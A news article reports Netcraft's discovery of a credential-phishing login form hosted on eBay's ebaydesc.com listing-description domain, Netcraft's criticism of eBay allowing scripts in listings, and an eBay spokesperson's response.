Fraudsters are targeting eBay sellers right on eBay’s own website, according to Netcraft.
The security publication published a screenshot of a page on eBay that fraudsters used in an attempt to steal eBay usernames and passwords from unsuspecting users. “The convincing appearance of the spoof login form is bolstered by the fact that it is hosted on a genuine eBay domain, ebaydesc.com. This domain is ordinarily used to host descriptions for eBay listings which are displayed within iframes on eBay listing pages.”
Netcraft says the scam is so well done that anyone who was victimized may never realize their information was sent to a scammer’s site and had their credentials stolen.
Netcraft was critical of eBay’s practices that it says allows anyone to insert arbitrary HTML and malicious scripts into a listing’s description, “particularly as this weakness has been exploited to carry out similar attacks against eBay users in the past.”
It pointed to incidents it reported last year in which fraudsters allegedly injected malicious JavaScript into eBay listings to set up man-in-the-middle attacks against car buyers, “and similar JavaScript redirection techniques have continued to be exploited throughout 2015,” it said.
We asked eBay to provide a comment on the Netcraft report and what users could do to protect themselves from phishing attacks on its website.
eBay spokesperson Ryan Moore emailed the following response: “As a company, we’re committed to providing a safe and secure marketplace for our millions of customers around the world. We take reported security issues very seriously, and work quickly to evaluate them within the context of our entire security infrastructure.
“We’re aware of this particular issue, which involves fraudsters attempting to phish customers using malicious code in very limited use cases. This type of scheme is extremely rare on our platform, as is malicious user-generated content in general.
“We’re continuously adapting our security systems as we become aware of new forms of malicious code, as well as taking the necessary steps to prevent such phishing attempts.”